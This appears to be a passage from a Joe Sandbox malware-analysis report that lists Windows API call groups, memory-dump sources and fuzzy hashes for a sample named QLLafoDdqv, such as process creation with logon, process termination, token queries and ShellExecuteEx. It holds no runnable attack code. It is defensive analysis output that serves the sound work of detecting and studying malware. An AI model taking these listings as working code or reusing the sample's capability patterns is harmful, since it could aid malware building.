              APIs
              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0074080C
              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00740847
              • EnterCriticalSection.KERNEL32(?), ref: 00740863
              • LeaveCriticalSection.KERNEL32(?), ref: 007408DC
              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007408F3
              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00740921
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
              • String ID:
              • API String ID: 3368777196-0
              • Opcode ID: a8335e4c86517027f223620b37c6711a4ae58d348f5b3d6f065f9843ec3fde23
              • Instruction ID: 176038c1395d604e9a5befa5a508e98b62bc0755d1b71423d633178c50660099
              • Opcode Fuzzy Hash: a8335e4c86517027f223620b37c6711a4ae58d348f5b3d6f065f9843ec3fde23
              • Instruction Fuzzy Hash: 28419C71900205EFEF05AF54DC85A6A7779FF04300F1080A9EE00AA297DB74EE65DBA8
              APIs
              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0072F3AB,00000000,?,?,00000000,?,0072682C,00000004,00000000,00000000), ref: 0076824C
              • EnableWindow.USER32(00000000,00000000), ref: 00768272
              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 007682D1
              • ShowWindow.USER32(00000000,00000004), ref: 007682E5
              • EnableWindow.USER32(00000000,00000001), ref: 0076830B
              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0076832F
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Show$Enable$MessageSend
              • String ID:
              • API String ID: 642888154-0
              • Opcode ID: 2ac1a5c29f5fe90d9aac1d4f4f798fbe6ce6075ddb300de8d99bb6ea6498d3be
              • Instruction ID: 496c3847ef0e472e8fc63a7f21895a7a5a06340e9cf15d6852dc64cdd15b8fdd
              • Opcode Fuzzy Hash: 2ac1a5c29f5fe90d9aac1d4f4f798fbe6ce6075ddb300de8d99bb6ea6498d3be
              • Instruction Fuzzy Hash: 7241E830601640EFDB56CF15C8A9BE87BE0FB46714F1843A9E94A4F272CB39A841CB46
              APIs
              • IsWindowVisible.USER32(?), ref: 00734C95
              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00734CB2
              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00734CEA
              • _wcslen.LIBCMT ref: 00734D08
              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00734D10
              • _wcsstr.LIBVCRUNTIME ref: 00734D1A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
              • String ID:
              • API String ID: 72514467-0
              • Opcode ID: c6f299c3a6a5714df1f7c775347e62be22133b050a1753b64e178597bc7d7c19
              • Instruction ID: 652acf3116213d61dedf365a65aee826ed49ec27f3cca9cf57ff2e2045c466d2
              • Opcode Fuzzy Hash: c6f299c3a6a5714df1f7c775347e62be22133b050a1753b64e178597bc7d7c19
              • Instruction Fuzzy Hash: B2212932305304BBFB195B35EC09E7B7B9DDF45750F10806DF905CA192EEA9EC0086A4
              APIs
                • Part of subcall function 006D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D3A97,?,?,006D2E7F,?,?,?,00000000), ref: 006D3AC2
              • _wcslen.LIBCMT ref: 0074587B
              • CoInitialize.OLE32(00000000), ref: 00745995
              • CoCreateInstance.OLE32(0076FCF8,00000000,00000001,0076FB68,?), ref: 007459AE
              • CoUninitialize.OLE32 ref: 007459CC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
              • String ID: .lnk
              • API String ID: 3172280962-24824748
              • Opcode ID: c94bdcb5356e88c5c068ab8dba1a093f5b7c3958d45d01a1fe4b443b555559cf
              • Instruction ID: 34272237e39419d327b684f75dea15cc4c646b881185779a39875e0e21873e5a
              • Opcode Fuzzy Hash: c94bdcb5356e88c5c068ab8dba1a093f5b7c3958d45d01a1fe4b443b555559cf
              • Instruction Fuzzy Hash: 7ED143B1A08701DFC714DF24C48492ABBE6EF89710F14895DF88A9B362DB35EC45CB92
              APIs
                • Part of subcall function 00730FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00730FCA
                • Part of subcall function 00730FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00730FD6
                • Part of subcall function 00730FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00730FE5
                • Part of subcall function 00730FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00730FEC
                • Part of subcall function 00730FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00731002
              • GetLengthSid.ADVAPI32(?,00000000,00731335), ref: 007317AE
              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007317BA
              • HeapAlloc.KERNEL32(00000000), ref: 007317C1
              • CopySid.ADVAPI32(00000000,00000000,?), ref: 007317DA
              • GetProcessHeap.KERNEL32(00000000,00000000,00731335), ref: 007317EE
              • HeapFree.KERNEL32(00000000), ref: 007317F5
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
              • String ID:
              • API String ID: 3008561057-0
              • Opcode ID: ef3157d1178847a0f2e254d23b2e48c8bef6dc1568ed7cfab561c10aea7ddfd2
              • Instruction ID: ce9f4102562c6a17b14b863ccf99e89bef7022874a9e246e2233330f1cbae1e7
              • Opcode Fuzzy Hash: ef3157d1178847a0f2e254d23b2e48c8bef6dc1568ed7cfab561c10aea7ddfd2
              • Instruction Fuzzy Hash: FC11BE71500205FFEB259FA4CC49BBE7BA9EB42355F588018F48297212D77AAD44CB70
              APIs
              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007314FF
              • OpenProcessToken.ADVAPI32(00000000), ref: 00731506
              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00731515
              • CloseHandle.KERNEL32(00000004), ref: 00731520
              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0073154F
              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00731563
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
              • String ID:
              • API String ID: 1413079979-0
              • Opcode ID: 30ace8396ff4b67202ace4f4f5582e1ac98434b35af4cc632e69d70966ce7b31
              • Instruction ID: 7752e96556bf7098752836b9a4189164ee6656ee30418db30c411410b39aff72
              • Opcode Fuzzy Hash: 30ace8396ff4b67202ace4f4f5582e1ac98434b35af4cc632e69d70966ce7b31
              • Instruction Fuzzy Hash: E9116A7250024DEBEF128F98DD49FEE7BA9EF48744F048015FA06A2160C3B9CE60DB60
              APIs
              • GetLastError.KERNEL32(?,?,006F3379,006F2FE5), ref: 006F3390
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006F339E
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006F33B7
              • SetLastError.KERNEL32(00000000,?,006F3379,006F2FE5), ref: 006F3409
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 5e8d5aa230d56d240fcb7788c7ad66c8a91b4fbc19379eb3681a03ceac465f8e
              • Instruction ID: 9529aa9e34b84ad00dae042c4f8f1d4d761b0bd74a4551f670112d56e64e3996
              • Opcode Fuzzy Hash: 5e8d5aa230d56d240fcb7788c7ad66c8a91b4fbc19379eb3681a03ceac465f8e
              • Instruction Fuzzy Hash: 35012433208339BEAA2627787C85AB72A96EB15379B20422EF710C43F0EF554D12514C
              APIs
              • GetLastError.KERNEL32(?,?,00705686,00713CD6,?,00000000,?,00705B6A,?,?,?,?,?,006FE6D1,?,00798A48), ref: 00702D78
              • _free.LIBCMT ref: 00702DAB
              • _free.LIBCMT ref: 00702DD3
              • SetLastError.KERNEL32(00000000,?,?,?,?,006FE6D1,?,00798A48,00000010,006D4F4A,?,?,00000000,00713CD6), ref: 00702DE0
              • SetLastError.KERNEL32(00000000,?,?,?,?,006FE6D1,?,00798A48,00000010,006D4F4A,?,?,00000000,00713CD6), ref: 00702DEC
              • _abort.LIBCMT ref: 00702DF2
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 1bf2c61ca496c118ac84d8d4ab22444a04b3b128eba0b0ea8065ae74983b2727
              • Instruction ID: 6cfdca0e940aa55a786ef650f56660886d82423e6a7976676cc39de376e08ec3
              • Opcode Fuzzy Hash: 1bf2c61ca496c118ac84d8d4ab22444a04b3b128eba0b0ea8065ae74983b2727
              • Instruction Fuzzy Hash: 40F0A477644600F7C6137735AC0EA2A26D9AFC27A5B358719F825922E3EE6C9C034165
              APIs
                • Part of subcall function 006E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E9693
                • Part of subcall function 006E9639: SelectObject.GDI32(?,00000000), ref: 006E96A2
                • Part of subcall function 006E9639: BeginPath.GDI32(?), ref: 006E96B9
                • Part of subcall function 006E9639: SelectObject.GDI32(?,00000000), ref: 006E96E2
              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00768A4E
              • LineTo.GDI32(?,00000003,00000000), ref: 00768A62
              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00768A70
              • LineTo.GDI32(?,00000000,00000003), ref: 00768A80
              • EndPath.GDI32(?), ref: 00768A90
              • StrokePath.GDI32(?), ref: 00768AA0
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
              • String ID:
              • API String ID: 43455801-0
              • Opcode ID: f550b3b9478693dd57922e8204f6d2f56b350bbdddb44621cd323f9a5b4d8501
              • Instruction ID: 52592dd170973d18b7b48f2c46c376cab8ae405443b3a318e06d09a373665f71
              • Opcode Fuzzy Hash: f550b3b9478693dd57922e8204f6d2f56b350bbdddb44621cd323f9a5b4d8501
              • Instruction Fuzzy Hash: 6011FA7600024CFFEB129F94DC48EAA7F6DEB08350F00C012FA5699161C7759D55DBA4
              APIs
              • GetDC.USER32(00000000), ref: 00735218
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00735229
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00735230
              • ReleaseDC.USER32(00000000,00000000), ref: 00735238
              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0073524F
              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00735261
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              • API String ID: 1035833867-0
              • Opcode ID: 76eabd7d5670af19740b4cf0828191f4f75e8da2679fba080eb5bd5d5bf2d6e3
              • Instruction ID: 2e758272dbe18e8a85b09aafdbf5d1e91300496cf326e1cbe9440c3b58ecdc2d
              • Opcode Fuzzy Hash: 76eabd7d5670af19740b4cf0828191f4f75e8da2679fba080eb5bd5d5bf2d6e3
              • Instruction Fuzzy Hash: 65018FB5A00718BBEB119BA5DC49A5EBFB8FB48351F048066FA05A7281D6B49800CBA4
              APIs
              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006D1BF4
              • MapVirtualKeyW.USER32(00000010,00000000), ref: 006D1BFC
              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006D1C07
              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006D1C12
              • MapVirtualKeyW.USER32(00000011,00000000), ref: 006D1C1A
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 006D1C22
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Virtual
              • String ID:
              • API String ID: 4278518827-0
              • Opcode ID: f8f573ff264a3accc1374b1108628eac8e54e81d8ab5dede308f89756a343562
              • Instruction ID: 04f8397cd30ee4ca6652d0ca47f51ccfab23aec15ea65f99ff32b51637731597
              • Opcode Fuzzy Hash: f8f573ff264a3accc1374b1108628eac8e54e81d8ab5dede308f89756a343562
              • Instruction Fuzzy Hash: B50148B090275A7DE3008F5A8C85A52FEA8FF19354F00415B915C47941C7F5A864CBE5
              APIs
              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0073EB30
              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0073EB46
              • GetWindowThreadProcessId.USER32(?,?), ref: 0073EB55
              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0073EB64
              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0073EB6E
              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0073EB75
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
              • String ID:
              • API String ID: 839392675-0
              • Opcode ID: 97f5b6ac5880c7a9c23156c82bb810a0581617701c6eb053d980895b06a0684a
              • Instruction ID: e84d1ee2c240ca9e514bce230c3ac318a71878f39679f3d13464842d4fe44adc
              • Opcode Fuzzy Hash: 97f5b6ac5880c7a9c23156c82bb810a0581617701c6eb053d980895b06a0684a
              • Instruction Fuzzy Hash: BCF01DB2140258BBE6226752DC0EEBB7A7CEFCAB11F008158F642E119196E85A0186B9
              APIs
              • GetClientRect.USER32(?), ref: 00727452
              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00727469
              • GetWindowDC.USER32(?), ref: 00727475
              • GetPixel.GDI32(00000000,?,?), ref: 00727484
              • ReleaseDC.USER32(?,00000000), ref: 00727496
              • GetSysColor.USER32(00000005), ref: 007274B0
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClientColorMessagePixelRectReleaseSendWindow
              • String ID:
              • API String ID: 272304278-0
              • Opcode ID: 56e8d662c2ec022928b0fc2c3a009533f9be6e994307af506aef4df51e9a94cc
              • Instruction ID: dcf92beec899307d520581f1c77654c3c05a388ef2c6bbd20112727ae290b071
              • Opcode Fuzzy Hash: 56e8d662c2ec022928b0fc2c3a009533f9be6e994307af506aef4df51e9a94cc
              • Instruction Fuzzy Hash: D801AD31400355EFEB126FA4EC08BBA7BB5FF04311F608060F956A21A1CB791E51EB54
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0073187F
              • UnloadUserProfile.USERENV(?,?), ref: 0073188B
              • CloseHandle.KERNEL32(?), ref: 00731894
              • CloseHandle.KERNEL32(?), ref: 0073189C
              • GetProcessHeap.KERNEL32(00000000,?), ref: 007318A5
              • HeapFree.KERNEL32(00000000), ref: 007318AC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
              • String ID:
              • API String ID: 146765662-0
              • Opcode ID: c1923dbc58f787326767a73917f90bf901ac767ab05dcdeec0e15f16198bfdc0
              • Instruction ID: 141c59215779c5d4788b32c57112b7e50769a73c984b7c135b9074fcd14691a2
              • Opcode Fuzzy Hash: c1923dbc58f787326767a73917f90bf901ac767ab05dcdeec0e15f16198bfdc0
              • Instruction Fuzzy Hash: D1E0ED76004205BBDB026FA2ED0C915BF39FF4A722710C221F26691170CBB65420DF64
              APIs
              • __Init_thread_footer.LIBCMT ref: 006DBEB3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: D%z$D%z$D%z$D%zD%z
              • API String ID: 1385522511-3299656855
              • Opcode ID: 1820b6924b1cda8e42478be900116b557a273e6a701fc6d5d1c3541a110da116
              • Instruction ID: 76cdcd034df3da95fbb41347c63be535bc09ddb897b6cc40f19f547912ba22df
              • Opcode Fuzzy Hash: 1820b6924b1cda8e42478be900116b557a273e6a701fc6d5d1c3541a110da116
              • Instruction Fuzzy Hash: 69913975E0020ACFCB18CF59C0906A9B7F2FF99310B25916ED945AB355E731E982CB90
              APIs
                • Part of subcall function 006F0242: EnterCriticalSection.KERNEL32(007A070C,007A1884,?,?,006E198B,007A2518,?,?,?,006D12F9,00000000), ref: 006F024D
                • Part of subcall function 006F0242: LeaveCriticalSection.KERNEL32(007A070C,?,006E198B,007A2518,?,?,?,006D12F9,00000000), ref: 006F028A
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 006F00A3: __onexit.LIBCMT ref: 006F00A9
              • __Init_thread_footer.LIBCMT ref: 00757BFB
                • Part of subcall function 006F01F8: EnterCriticalSection.KERNEL32(007A070C,?,?,006E8747,007A2514), ref: 006F0202
                • Part of subcall function 006F01F8: LeaveCriticalSection.KERNEL32(007A070C,?,006E8747,007A2514), ref: 006F0235
              Similarity
              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
              • String ID: +Tr$5$G$Variable must be of type 'Object'.
              • API String ID: 535116098-3922178991
              • Opcode ID: 0854f99a450e2d71757cd8f558c412b4f6020a085e3a82e677368634d6cc63e7
              • Instruction ID: 2206e359d11c50ddeb99546b003d16ca6d0b0d8ef8046fee7470b2ae0cee4b54
              • Opcode Fuzzy Hash: 0854f99a450e2d71757cd8f558c412b4f6020a085e3a82e677368634d6cc63e7
              • Instruction Fuzzy Hash: 33916E70A04209EFCB08EF54E8959FDB7B6BF45301F108059FC069B292DBB9AE49CB51
              APIs
                • Part of subcall function 006D7620: _wcslen.LIBCMT ref: 006D7625
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0073C6EE
              • _wcslen.LIBCMT ref: 0073C735
              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0073C79C
              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0073C7CA
              Similarity
              • API ID: ItemMenu$Info_wcslen$Default
              • String ID: 0
              • API String ID: 1227352736-4108050209
              • Opcode ID: 59dfcd48fa876ac005c23a0aba2189b083c1abbeb38f14573035949fb732ae67
              • Instruction ID: e5643bfa15046385d4a978f1d28c96324a376140dacba306339e2fa206df9a4f
              • Opcode Fuzzy Hash: 59dfcd48fa876ac005c23a0aba2189b083c1abbeb38f14573035949fb732ae67
              • Instruction Fuzzy Hash: 4751E2726043409BF7529F28C885B6B77E8AF89310F040A2DF996F31A2DB78DD04CB56
              APIs
              • ShellExecuteExW.SHELL32(0000003C), ref: 0075AEA3
                • Part of subcall function 006D7620: _wcslen.LIBCMT ref: 006D7625
              • GetProcessId.KERNEL32(00000000), ref: 0075AF38
              • CloseHandle.KERNEL32(00000000), ref: 0075AF67
              Similarity
              • API ID: CloseExecuteHandleProcessShell_wcslen
              • String ID: <$@
              • API String ID: 146682121-1426351568
              • Opcode ID: c1b7368c736839eaabeb92469f130d4b519100d62addbaf9cd4a0ac1d4f944bb
              • Instruction ID: b2ca69c7a6418ea6f542347675365c20de0372fe578b24fc5c439158ad828611
